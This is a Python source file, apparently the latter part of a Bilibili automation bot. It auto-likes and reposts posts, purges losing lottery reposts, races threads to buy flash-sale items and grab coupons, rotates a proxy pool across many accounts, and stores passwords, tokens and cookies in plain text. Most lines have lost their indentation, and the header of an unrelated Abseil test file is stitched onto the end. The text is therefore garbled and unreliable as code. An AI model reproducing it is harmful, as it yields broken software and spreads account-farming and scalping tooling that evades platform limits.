    # Like a dynamic (feed post)
    def dynamic_like(self, did):
        # did = dynamic ID
url = f"{self.protocol}://api.vc.bilibili.com/dynamic_like/v1/dynamic_like/thumb"
payload = {
'uid': self.get_uid(),
'dynamic_id': did,
'up': 1,
'csrf_token': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded",
'Host': "api.vc.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': "https://space.bilibili.com/208259/",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"动态{did}点赞成功")
return True
else:
self._log(f"动态{did}点赞失败 {response}")
return False
    # Repost a dynamic
    def dynamic_repost(self, did, message="转发动态", ats=[]):
        # did = dynamic ID
        # message = repost text
        # ats = UIDs of users to @-mention
def uid_to_nickname(mid):
url = f"{self.protocol}://api.bilibili.com/x/web-interface/card?mid={mid}"
response = self._requests("get", url)
if response and response.get("code") == 0:
return response['data']['card']['name']
else:
return ""
url = f"{self.protocol}://api.vc.bilibili.com/dynamic_repost/v1/dynamic_repost/repost"
ctrl = []
for at in zip(ats, [uid_to_nickname(mid) for mid in ats]):
ctrl.append({
'data': str(at[0]),
'location': len(message) + 1,
'length': len(at[1]) + 1,
'type': 1,
})
message = f"{message} @{at[1]}"
payload = {
'uid': self.get_uid(),
'dynamic_id': did,
'content': message,
'at_uids': ",".join([str(at) for at in ats]),
'ctrl': json.dumps(ctrl),
'csrf_token': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded",
'Host': "api.vc.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': "https://space.bilibili.com/208259/",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
self._log(f"动态{did}转发成功")
return True
else:
self._log(f"动态{did}转发失败 {response}")
return False
    # Purge reposted lottery dynamics
def dynamic_purge(self):
def get_lottery_dynamics():
headers = {
'Host': "api.vc.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/dynamic",
}
dynamics = []
offset = 0
while True:
url = f"{self.protocol}://api.vc.bilibili.com/dynamic_svr/v1/dynamic_svr/space_history?visitor_uid={self.get_uid()}&host_uid={self.get_uid()}&offset_dynamic_id={offset}"
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
if response['data']['has_more']:
dynamics.extend([{
'did': card['desc']['dynamic_id'],
'lottery_did': card['desc']['orig_dy_id'],
} for card in response['data']['cards'] if card['desc']['orig_type'] == 2 or card['desc']['orig_type'] == 1024])
offset = response['data']['cards'][-1]['desc']['dynamic_id']
else:
return dynamics
dynamics = get_lottery_dynamics()
self._log(f"发现{len(dynamics)}条互动抽奖动态")
delete = 0
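        # For every reposted lottery dynamic, check the draw result: skip dynamics that have not
        # been drawn yet or that won a prize, and delete the losing reposts.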
for dynamic in dynamics:
url = f"{self.protocol}://api.vc.bilibili.com/lottery_svr/v2/lottery_svr/lottery_notice?dynamic_id={dynamic['lottery_did']}"
headers = {
'Host': "api.vc.bilibili.com",
'Origin': "https://t.bilibili.com",
'Referer': "https://t.bilibili.com/lottery/h5/index/",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
expired = response['data']['status'] == 2 or response['data']['status'] == -1
winning = any(self.get_uid() in winners for winners in [response['data'].get("lottery_result", {}).get(f"{level}_prize_result", []) for level in ["first", "second", "third"]])
if not expired:
self._log(f"动态{dynamic['lottery_did']}尚未开奖({time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(response['data']['lottery_time']))}), 跳过")
else:
if winning:
self._log(f"动态{dynamic['lottery_did']}中奖, 跳过")
else:
url = f"{self.protocol}://api.vc.bilibili.com/dynamic_repost/v1/dynamic_repost/rm_rp_dyn"
payload = {
'uid': self.get_uid(),
'dynamic_id': dynamic['did'],
'csrf_token': self.get_csrf(),
}
headers = {
'Content-Type': "application/x-www-form-urlencoded",
'Host': "api.vc.bilibili.com",
'Origin': "https://space.bilibili.com",
'Referer': f"https://space.bilibili.com/{self.get_uid()}/dynamic",
}
response = self._requests("post", url, data=payload, headers=headers)
if response and response.get("code") == 0:
delete += 1
self._log(f"动态{dynamic['lottery_did']}未中奖, 清理成功")
else:
self._log(f"动态{dynamic['lottery_did']}未中奖, 清理失败")
time.sleep(1)
self._log(f"清理了{delete}条动态")
    # Query system notices
    def system_notice(self, time_span=["", ""], keyword=[]):
        # time_span = time range
        # keyword = keywords to match
cursor_span = [int(time.mktime(time.strptime(element, "%Y-%m-%d %H:%M:%S")) * 1E9) if element else "" for element in time_span]
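        # Cursors are nanosecond timestamps; pagination walks backwards from the end of the
        # requested span until a notice older than its start is encountered.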
headers = {
'Host': "message.bilibili.com",
'Referer': "https://message.bilibili.com/",
}
notice_list = []
cursor = cursor_span[1]
while True:
url = f"{self.protocol}://message.bilibili.com/api/notify/query.sysnotify.list.do?data_type=1{'&cursor=' + str(cursor) if cursor else ''}"
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
for notice in response['data']:
if not cursor_span[0] or notice['cursor'] > cursor_span[0]:
                        if not keyword or any(word in notice['title'] or word in notice['content'] for word in keyword):
notice_list.append({
'time': notice['time_at'],
'title': notice['title'],
'content': notice['content'],
})
else:
break
else:
if len(response['data']) == 20:
cursor = notice['cursor']
continue
self._log(f"系统通知获取成功, 总计{len(notice_list)}条通知")
for notice in notice_list:
self._log(f"{notice['title']}({notice['time']}): {notice['content']}")
self.__push_to_queue("system_notice", notice_list)
return notice_list
    # Mall (会员购) flash purchase
    def mall_rush(self, item_id, thread=1, headless=True, timeout=10):
        # item_id = item ID
        # thread = number of threads
        # headless = hide the browser window
        # timeout = seconds without progress before the page is refreshed
def executor(thread_id):
def find_and_click(class_name):
try:
element = driver.find_element_by_class_name(class_name)
element.click()
except:
element = None
return element
options = webdriver.ChromeOptions()
options.add_argument("log-level=3")
if headless:
options.add_argument("headless")
else:
options.add_argument("disable-infobars")
options.add_argument("window-size=374,729")
if platform.system() == "Linux":
options.add_argument("no-sandbox")
options.add_experimental_option("mobileEmulation", {'deviceName': "Nexus 5"})
if platform.system() == "Windows":
options.binary_location = "chrome-win\\chrome.exe"
driver = webdriver.Chrome(executable_path="chromedriver.exe" if platform.system() == "Windows" else "chromedriver", options=options)
driver.get(f"{self.protocol}://mall.bilibili.com/detail.html?itemsId={item_id}")
for key, value in self.get_cookies().items():
driver.add_cookie({
'name': key,
'value': value,
'domain': ".bilibili.com",
})
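            # Poll the item info API until the sale has started (serverTime >= startTime), then
            # keep locating and clicking the buy / confirm / pay buttons by their CSS class names.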
self._log(f"(线程{thread_id})商品{item_id}开始监视库存")
url = f"{self.protocol}://mall.bilibili.com/mall-c/items/info?itemsId={item_id}"
while True:
response = self._requests("get", url)
if response and response.get("code") == 0 and response['data']['activityInfoVO']['serverTime'] >= response['data']['activityInfoVO']['startTime'] if response['data']['activityInfoVO'] else True:
break
timestamp = time.time()
in_stock = False
while True:
try:
result = {class_name: find_and_click(class_name) for class_name in ["bottom-buy-button", "button", "dot", "pay-btn", "expire-time-format", "alert-ok", "error-button"]}
if result['bottom-buy-button']:
if "bottom-buy-disable" not in result['bottom-buy-button'].get_attribute("class"):
if not in_stock:
self._log(f"(线程{thread_id})商品{item_id}已开放购买")
in_stock = True
else:
if in_stock:
self._log(f"(线程{thread_id})商品{item_id}暂无法购买, 原因为{result['bottom-buy-button'].text}")
in_stock = False
driver.refresh()
timestamp = time.time()
if result['pay-btn']:
timestamp = time.time()
if result['alert-ok']:
driver.refresh()
if result['expire-time-format']:
self._log(f"(线程{thread_id})商品{item_id}订单提交成功, 请在{result['expire-time-format'].text}内完成支付")
driver.quit()
return True
if time.time() - timestamp > timeout:
self._log(f"(线程{thread_id})商品{item_id}操作超时, 当前页面为{driver.current_url}")
driver.get(f"{self.protocol}://mall.bilibili.com/detail.html?itemsId={item_id}")
timestamp = time.time()
except:
pass
threads = []
for i in range(thread):
threads.append(threading.Thread(target=executor, args=(i + 1,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
    # Claim a mall coupon
    def mall_coupon(self, coupon_id, thread=1):
        # coupon_id = coupon ID
        # thread = number of threads
def get_coupon_info(coupon_id):
url = f"{self.protocol}://mall.bilibili.com/mall-c/coupon/user_coupon_code_receive_status_list"
payload = {
'couponIds': [str(coupon_id)],
'mid': "",
'csrf': self.get_csrf(),
}
headers = {
'Host': "mall.bilibili.com",
'Origin': "https://www.bilibili.com",
}
response = self._requests("post", url, json=payload, headers=headers)
if response and response.get("code") == 0:
return {
'end': response['data'][0]['receiveEndTime'],
'message': response['data'][0]['couponStatusMsg'],
'name': response['data'][0]['couponName'],
'total': response['data'][0]['provideNum'],
'remain': response['data'][0]['remainNum'],
'start': response['data'][0]['receiveStartTime'],
'status': response['data'][0]['receiveStatus'],
}
def get_server_time(target_time=0):
url = f"{self.protocol}://mall.bilibili.com/mall-c/common/time/remain?v={int(time.time())}&targetTime={target_time}"
headers = {
'Host': "mall.bilibili.com",
'Origin': "https://www.bilibili.com",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
return {
'current': response['data']['serverTime'],
'remain': response['data']['remainSeconds'],
}
def executor(thread_id):
url = f"{self.protocol}://mall.bilibili.com/mall-c/coupon/create_coupon_code?couponId={coupon_id}&deviceId="
payload = {'csrf': self.get_csrf()}
headers = {
'Host': "mall.bilibili.com",
'Origin': "https://www.bilibili.com",
}
nonlocal flag
while not flag:
response = self._requests("post", url, json=payload, headers=headers)
if response and response.get("code") is not None:
if response['code'] == 83094004:
self._log(f"(线程{thread_id})会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})领取成功")
elif response['code'] == 83110005:
self._log(f"(线程{thread_id})会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})领取失败, 优惠券领取数量已达到上限")
elif response['code'] == 83110015:
self._log(f"(线程{thread_id})会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})领取失败, 优惠券库存不足")
else:
continue
else:
self._log(f"(线程{thread_id})会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})领取失败, 当前IP请求过于频繁")
flag = True
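        # Main flow: look up the coupon, wait until roughly 3 seconds before its claim window
        # opens, then let the worker threads defined above race to claim it.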
coupon_info = get_coupon_info(coupon_id)
if coupon_info:
if coupon_info['message'] == "可领取":
server_time = get_server_time(coupon_info['start'])
if server_time:
delay = max(server_time['remain'] - 3, 0)
self._log(f"会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id})可领取时间为{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon_info['start']))}至{time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon_info['end']))}, 库存{coupon_info['remain']}张, 将于{delay}秒后开始领取")
time.sleep(delay)
else:
self._log(f"会员购服务器时间获取失败")
return
else:
self._log(f"会员购优惠卷\"{coupon_info['name']}\"(ID={coupon_id}){coupon_info['message']}")
return
else:
self._log(f"会员购优惠卷{coupon_id}信息获取失败")
return
flag = False
threads = []
for i in range(thread):
threads.append(threading.Thread(target=executor, args=(i + 1,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
    # Query the mall order list
    def mall_order_list(self, status=0, type=[2]):
        # status = order status
        # type = order types
def get_order_list(status, type):
headers = {
'Origin': "https://mall.bilibili.com",
'Referer': "https://mall.bilibili.com/orderlist.html",
}
order_list = []
page = 0
while True:
url = f"{self.protocol}://show.bilibili.com/api/ticket/ordercenter/list?pageNum={page}&pageSize=20&status={status}&customer=0&platform=h5&v={int(time.time())}"
response = self._requests("get", url, headers=headers)
if response and response.get("errno") == 0:
data = response['data']['list']
if data:
for order in data:
if not type or order['order_type'] in type:
order_list.append(order)
page += 1
else:
self._log(f"会员购订单列表获取成功, 总计{len(order_list)}个订单")
break
else:
self._log(f"会员购订单列表获取失败 {response}")
return order_list
def get_order_detail(order_id):
url = f"{self.protocol}://mall.bilibili.com/mall-c/order/detail?orderId={order_id}&platform=h5&time={int(time.time())}"
headers = {
'Origin': "https://mall.bilibili.com",
'Referer': f"https://mall.bilibili.com/orderdetail.html?orderId={order_id}",
}
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0 and response['data']['vo']:
data = response['data']['vo']
self._log(f"会员购订单{order_id}详情获取成功, 包含\"{data['skuList'][0]['itemsName']}\"等{len(data['skuList'])}件商品")
return data
else:
self._log(f"会员购订单{order_id}详情获取失败 {response}")
return {}
def get_order_express(order_id):
url = f"{self.protocol}://mall.bilibili.com/mall-c/order/express/detail?orderId={order_id}"
headers = {
'Origin': "https://mall.bilibili.com",
'Referer': f"https://mall.bilibili.com/orderdetail.html?orderId={order_id}",
}
for _ in range(5):
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0 and response['data']['vo']:
data = response['data']['vo']
self._log(f"会员购订单{order_id}物流获取成功, 状态为{data['state_v']}")
return data
time.sleep(3)
self._log(f"会员购订单{order_id}物流获取失败 {response}")
return {}
order_list = []
for order in get_order_list(status, type):
order_detail = get_order_detail(order['order_id'])
order_express = get_order_express(order['order_id']) if order_detail and order_detail['orderExpress'] else {}
order_list.append({
'id': order.get("order_id"),
'item': [{
'id': item.get("itemsId"),
'name': item.get("itemsName"),
'spec': item.get("skuSpec"),
'number': item.get("skuNum"),
'price': item.get("price"),
} for item in order_detail.get("skuList", [])],
                'create': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(order.get("order_ctime"))) if order.get("order_ctime") else None,
'status': {
'code': order.get("status"),
'name': order.get("status_name"),
},
'pay': {
'id': order_detail['orderBasic'].get("payId") if order_detail.get("orderBasic") else None,
'time': order.get("pay_ctime") if order.get("pay_ctime") != "0000-00-00 00:00:00" else None,
'channel': order_detail['orderBasic'].get("paymentChannel") if order_detail.get("orderBasic") else None,
'total': order.get("show_money") / 100 if order.get("show_money") else None,
'origin': order_detail['orderBasic'].get("payTotalMoney") if order_detail.get("orderBasic") else None,
'discount': order_detail['orderBasic'].get("discountMoneys") if order_detail.get("orderBasic") else None,
'express': order.get("express_fee") / 100 if order.get("express_fee") else None,
},
'preorder': {
'phone': order_detail['extData'].get("notifyPhoneOrigin") if order_detail.get("extData") else None,
'front': {
'total': order_detail['extData'].get("frontPayMoney") if order_detail.get("extData") else None,
'origin': order_detail['extData'].get("frontMoney") if order_detail.get("extData") else None,
'discount': order_detail['extData'].get("frontDisMoney") if order_detail.get("extData") else None,
},
'final': {
'total': order_detail['extData'].get("finalPayMoney") if order_detail.get("extData") else None,
'origin': order_detail['extData'].get("finalMoney") if order_detail.get("extData") else None,
'discount': order_detail['extData'].get("finalDisMoney") if order_detail.get("extData") else None,
'start': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(order_detail['extData'].get("finalMoneyStart") / 1E3)) if order_detail.get("extData") and order_detail['extData'].get("finalMoneyStart") else None,
                        'end': time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(order_detail['extData'].get("finalMoneyEnd") / 1E3)) if order_detail.get("extData") and order_detail['extData'].get("finalMoneyEnd") else None,
},
},
'shipping': {
'name': order_detail['orderDeliver'].get("deliverName") if order_detail.get("orderDeliver") else None,
'phone': order_detail['orderDeliver'].get("deliverPhone") if order_detail.get("orderDeliver") else None,
'address': order_detail['orderDeliver'].get("deliverAddr") if order_detail.get("orderDeliver") else None,
'company': order_detail['orderExpress'].get("com_v") if order_detail.get("orderExpress") else None,
'number': order_detail['orderExpress'].get("sno") if order_detail.get("orderExpress") else None,
'status': order_express.get("state_v"),
'detail': order_express.get("detail"),
},
})
self.__push_to_queue("mall_order_list", order_list)
return order_list
    # Query the mall coupon list
    def mall_coupon_list(self, status=1):
        # status = coupon status
status_map = {
1: "validList",
2: "usedList",
3: "invalidList",
}
if status not in status_map:
return []
headers = {
'Referer': "https://mall.bilibili.com/couponlist.html?noTitleBar=1",
}
coupon_list = []
page = 1
while True:
url = f"{self.protocol}://mall.bilibili.com/mall-c/coupon/list?status={status}&pageIndex={page}&pageSize=20"
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
if response['data'][status_map[status]]:
for coupon in response['data'][status_map[status]]['list']:
coupon_list.append({
'name': coupon['couponCodeName'],
'description': coupon['couponDesc'],
'detail': coupon['couponDetail'],
'discount': coupon['couponDiscount'],
'status': coupon['status'],
'type': coupon['couponCodeType'],
'start': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon['useStartTime'] / 1E3)) if coupon['useStartTime'] else None,
'end': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon['useEndTime'] / 1E3)) if coupon['useEndTime'] else None,
'use': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon['useTime'] / 1E3)) if coupon['useTime'] else None,
'expire': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(coupon['expireDate'] / 1E3)) if coupon['expireDate'] else None,
})
if response['data'][status_map[status]]['hasNextPage']:
page += 1
continue
self._log(f"会员购优惠券列表获取成功, 总计{len(coupon_list)}张优惠券")
for coupon in coupon_list:
self._log(f"会员购优惠券: {coupon['name']}" + (f", 失效时间为{coupon['expire']}" if coupon['expire'] else f", 使用时间为{coupon['use']}" if coupon['use'] else f", 使用有效期为{coupon['start']}至{coupon['end']}" if coupon['start'] and coupon['end'] else ""))
break
else:
self._log(f"会员购优惠券列表获取失败 {response}")
break
self.__push_to_queue("mall_coupon_list", coupon_list)
return coupon_list
    # Query the mall prize list
    def mall_prize_list(self, status=0, type=[1, 2]):
        # status = prize status
        # type = prize types
headers = {
'Referer': "https://mall.bilibili.com/prizecenter.html",
}
prize_list = []
page = 1
while True:
url = f"{self.protocol}://mall.bilibili.com/mall-c/prize/list?pageNum={page}&pageSize=20&type={status}&v={int(time.time())}"
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
for prize in response['data']['pageInfo']['list']:
if not type or prize['prizeType'] in type:
prize_list.append({
'name': prize['prizeName'],
'source': prize['sourceName'],
'status': prize['status'],
'type': prize['prizeType'],
'expire': time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(prize['expireTime'])),
})
if response['data']['pageInfo']['hasNextPage']:
page += 1
else:
self._log(f"会员购奖品列表获取成功, 总计{len(prize_list)}个奖品, {response['data']['waitDeliveryNum']}个奖品待发货")
for prize in prize_list:
self._log(f"会员购奖品: {prize['name']}, 来自{prize['source']}, 领取有效期至{prize['expire']}")
break
else:
self._log(f"会员购奖品列表获取失败 {response}")
break
self.__push_to_queue("mall_prize_list", prize_list)
return prize_list
    # Query the live-streaming prize list
def live_prize_list(self):
headers = {
'Origin': "https://link.bilibili.com",
'Referer': "https://link.bilibili.com/p/center/index",
}
prize_list = []
page = 1
while True:
url = f"{self.protocol}://api.live.bilibili.com/lottery/v1/award/award_list?page={page}&month="
response = self._requests("get", url, headers=headers)
if response and response.get("code") == 0:
for prize in response['data']['list']:
prize_list.append({
'name': prize['gift_name'],
'number': prize['gift_num'],
'source': prize['source'],
'status': prize['status'],
'type': prize['gift_type'],
'create': prize['create_time'],
'expire': prize['expire_time'],
})
if page < response['data']['total_page']:
page += 1
else:
self._log(f"直播奖品列表获取成功, 总计{len(prize_list)}个奖品")
for prize in prize_list:
self._log(f"直播奖品: {prize['name']} x{prize['number']}, 来自{prize['source']}, 中奖时间为{prize['create']}, 领取有效期至{prize['expire']}")
break
else:
self._log(f"直播奖品列表获取失败 {response}")
break
self.__push_to_queue("live_prize_list", prize_list)
return prize_list
# Detect a file's text encoding with chardet; fall back to the given default when detection is inconclusive.
def detect_charset(file, fallback="utf-8"):
    with open(file, "rb") as f:
        detector = chardet.UniversalDetector()
        for line in f.readlines():
            detector.feed(line)
            if detector.done:
                break
        detector.close()
        return detector.result['encoding'] or fallback
def download(url, save_as=None):
print(f"正在下载{url}")
if save_as is None:
save_as = url.split("/")[-1]
with open(save_as, "wb") as f:
response = requests.get(url, stream=True)
length = response.headers.get("content-length")
if length:
length = int(length)
receive = 0
for data in response.iter_content(chunk_size=100 * 1024):
f.write(data)
receive += len(data)
percent = receive / length
print(f"\r[{'=' * int(50 * percent)}{' ' * (50 - int(50 * percent))}] {percent:.0%}", end="", flush=True)
print()
else:
f.write(response.content)
return save_as
def decompress(file, remove=True):
shutil.unpack_archive(file)
if remove:
os.remove(file)
print(f"{file}解压完毕")
def export(queue, config):
bucket = {}
log_file = open(config['global']['log'], "a", encoding="utf-8") if config['global']['log'] else None
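    # Packets are dicts with 'uid', 'manufacturer' and 'data': log packets are appended to the
    # log file, other packets are bucketed per manufacturer and uid, and a None packet is the
    # shutdown sentinel that triggers the JSON export of every bucket.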
try:
while True:
packet = queue.get()
if isinstance(packet, dict) and all(key in packet for key in ['uid', 'manufacturer', 'data']):
if packet['manufacturer'] == "log":
if log_file:
log_file.write(packet['data'] + "\n")
else:
if packet['manufacturer'] not in bucket:
bucket[packet['manufacturer']] = {}
if packet['uid'] not in bucket[packet['manufacturer']]:
bucket[packet['manufacturer']][packet['uid']] = []
if isinstance(packet['data'], list):
bucket[packet['manufacturer']][packet['uid']].extend(packet['data'])
else:
bucket[packet['manufacturer']][packet['uid']].append(packet['data'])
elif packet is None:
for manufacturer, data in bucket.items():
if config.get(manufacturer, {}).get("export"):
with open(config[manufacturer]['export'], "w", encoding="utf-8") as f:
f.write(json.dumps(data, indent=4, ensure_ascii=False))
return
finally:
if log_file:
log_file.close()
def wrapper(arg):
def delay_wrapper(func, interval, arg_list=[()], shuffle=False):
if shuffle:
random.shuffle(arg_list)
for i in range(len(arg_list)):
func(*arg_list[i])
if i < len(arg_list) - 1:
time.sleep(interval)
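    # delay_wrapper spaces out repeated calls of the same task (optionally in shuffled order)
    # so that the per-account actions are not fired all at once.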
config, account, queue = arg['config'], arg['account'], arg['queue']
instance = Bilibili(config['global']['https'], queue)
if config['proxy']['enable']:
if isinstance(config['proxy']['pool'], str):
try:
with open(config['proxy']['pool'], "r", encoding=detect_charset(config['proxy']['pool'])) as f:
instance.set_proxy(add=[proxy for proxy in f.read().strip().splitlines() if proxy and proxy[0] != "#"])
except:
pass
elif isinstance(config['proxy']['pool'], list):
instance.set_proxy(add=config['proxy']['pool'])
if instance.login(force_refresh_token=config['user']['force_refresh_token'], **account):
threads = []
if config['get_user_info']['enable']:
threads.append(threading.Thread(target=instance.get_user_info))
if config['set_privacy']['enable']:
threads.append(threading.Thread(target=instance.set_privacy, args=(config['set_privacy']['show_favourite'], config['set_privacy']['show_bangumi'], config['set_privacy']['show_tag'], config['set_privacy']['show_reward'], config['set_privacy']['show_info'], config['set_privacy']['show_game'])))
if config['silver_to_coin']['enable']:
threads.append(threading.Thread(target=instance.silver_to_coin))
if config['watch']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.watch, 5, list(zip(config['watch']['aid'])))))
if config['like']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.like, 5, list(zip(config['like']['aid'])))))
if config['reward']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.reward, 5, list(zip(config['reward']['aid'], config['reward']['double'])))))
if config['favour']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.favour, 5, list(zip(config['favour']['aid'])))))
if config['combo']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.combo, 5, list(zip(config['combo']['aid'])))))
if config['share']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.share, 5, list(zip(config['share']['aid'])))))
if config['follow']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.follow, 5, list(zip(config['follow']['mid'], config['follow']['secret'])))))
if config['follow_batch']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.follow_batch, 5, list((config['follow_batch']['mid'][i:i + 50],) for i in range(0, len(config['follow_batch']['mid']), 50)))))
if config['danmaku_post']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.danmaku_post, 5, list(zip(config['danmaku_post']['aid'], config['danmaku_post']['message'], config['danmaku_post']['page'], config['danmaku_post']['moment'])))))
if config['comment_like']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.comment_like, 5, list(zip(config['comment_like']['otype'], config['comment_like']['oid'], config['comment_like']['rpid'])))))
if config['comment_post']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.comment_post, 5, list(zip(config['comment_post']['otype'], config['comment_post']['oid'], config['comment_post']['message'])))))
# for comment in zip(config['comment_post']['otype'], config['comment_post']['oid'], config['comment_post']['message']):
# threads.append(threading.Thread(target=instance.comment_post, args=(comment[0], comment[1], comment[2])))
if config['dynamic_like']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.dynamic_like, 5, list(zip(config['dynamic_like']['did'])))))
if config['dynamic_repost']['enable']:
threads.append(threading.Thread(target=delay_wrapper, args=(instance.dynamic_repost, 5, list(zip(config['dynamic_repost']['did'], config['dynamic_repost']['message'], config['dynamic_repost']['ats'])))))
if config['dynamic_purge']['enable']:
threads.append(threading.Thread(target=instance.dynamic_purge))
if config['system_notice']['enable']:
threads.append(threading.Thread(target=instance.system_notice, args=(config['system_notice']['time_span'], config['system_notice']['keyword'])))
if config['mall_rush']['enable']:
for item in zip(config['mall_rush']['item_id'], config['mall_rush']['thread']):
threads.append(threading.Thread(target=instance.mall_rush, args=(item[0], item[1], config['mall_rush']['headless'], config['mall_rush']['timeout'])))
if config['mall_coupon']['enable']:
for coupon in zip(config['mall_coupon']['coupon_id'], config['mall_coupon']['thread']):
threads.append(threading.Thread(target=instance.mall_coupon, args=(coupon[0], coupon[1])))
if config['mall_order_list']['enable']:
threads.append(threading.Thread(target=instance.mall_order_list, args=(config['mall_order_list']['status'], config['mall_order_list']['type'])))
if config['mall_coupon_list']['enable']:
threads.append(threading.Thread(target=instance.mall_coupon_list, args=(config['mall_coupon_list']['status'],)))
if config['mall_prize_list']['enable']:
threads.append(threading.Thread(target=instance.mall_prize_list, args=(config['mall_prize_list']['status'], config['mall_prize_list']['type'])))
if config['live_prize_list']['enable']:
threads.append(threading.Thread(target=instance.live_prize_list))
# instance._log("任务开始执行")
for thread in threads:
thread.start()
for thread in threads:
thread.join()
# instance._log("任务执行完毕")
return {
'username': instance.username,
'password': instance.password,
'access_token': instance.access_token,
'refresh_token': instance.refresh_token,
'cookie': instance.get_cookies(),
}
def main():
print(f"{banner}\n{__doc__}\n版本: {__version__}\n")
config_file = sys.argv[1] if len(sys.argv) > 1 else "config.toml"
try:
with open(config_file, "r", encoding=detect_charset(config_file)) as f:
config = toml.load(f)
except:
print(f"无法加载{config_file}")
return
accounts = []
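    # Each non-comment line of [user].account holds one credential set as "key=value;key=value;...";
    # a set is accepted if it forms a complete username/password, token pair, or cookie set.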
for line in config['user']['account'].splitlines():
try:
if line[0] == "#":
continue
pairs = {}
for pair in line.strip(";").split(";"):
if len(pair.split("=")) == 2:
key, value = pair.split("=")
pairs[key] = value
password = all(key in pairs for key in ["username", "password"])
token = all(key in pairs for key in ["access_token", "refresh_token"])
cookie = all(key in pairs for key in ["bili_jct", "DedeUserID", "DedeUserID__ckMd5", "sid", "SESSDATA"])
if password or token or cookie:
accounts.append(pairs)
except:
pass
config['user'].pop("account")
print(f"导入了{len(accounts)}个用户")
if not accounts:
return
if config['mall_rush']['enable']:
if platform.system() == "Linux" and os.path.exists("/etc/debian_version"):
prefix = "sudo " if shutil.which("sudo") else ""
if shutil.which("chromium-browser") is None:
os.system(f"{prefix}apt -y install chromium-browser")
if shutil.which("chromedriver") is None:
os.system(f"{prefix}apt -y install chromium-chromedriver")
os.system(f"{prefix}ln -s /usr/lib/chromium-browser/chromedriver /usr/bin")
elif platform.system() == "Linux" and os.path.exists("/etc/redhat-release"):
prefix = "sudo " if shutil.which("sudo") else ""
if shutil.which("chromium-browser") is None:
os.system(f"{prefix}yum -y install chromium")
if shutil.which("chromedriver") is None:
os.system(f"{prefix}yum -y install chromedriver")
elif platform.system() == "Windows":
if not os.path.exists("chrome-win\\chrome.exe"):
decompress(download("https://npm.taobao.org/mirrors/chromium-browser-snapshots/Win/706915/chrome-win.zip"))
if not os.path.exists("chromedriver.exe"):
decompress(download("https://npm.taobao.org/mirrors/chromedriver/79.0.3945.36/chromedriver_win32.zip"))
else:
print("会员购抢购组件不支持在当前平台上运行")
config['mall_rush']['enable'] = False
queue = Manager().Queue()
export_process = Process(target=export, args=(queue, config))
export_process.start()
with Pool(min(config['global']['process'], len(accounts))) as p:
result = p.map(wrapper, [{
'config': config,
'account': account,
'queue': queue,
} for account in accounts])
p.close()
p.join()
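    # When user.update is enabled, the refreshed credentials returned by each worker are written
    # back into the account = """...""" block of the config file.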
if config['user']['update']:
with open(config_file, "r+", encoding=detect_charset(config_file)) as f:
content = f.read()
before = content.split("account")[0]
after = content.split("account")[-1].split("\"\"\"")[-1]
f.seek(0)
f.truncate()
f.write(before)
f.write("account = \"\"\"\n")
for credential in result:
new_line = False
for key, value in credential.items():
if value:
if key == "cookie":
f.write(f"{';'.join(f'{key}={value}' for key, value in value.items())};")
else:
f.write(f"{key}={value};")
new_line = True
if new_line:
f.write("\n")
f.write("\"\"\"")
f.write(after)
print("凭据已更新")
queue.put(None)
export_process.join()
if __name__ == "__main__":
freeze_support()
main()
if platform.system() == "Windows":
os.system("pause >nul | set /p =请按任意键退出")
|
xml_reporter_test.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
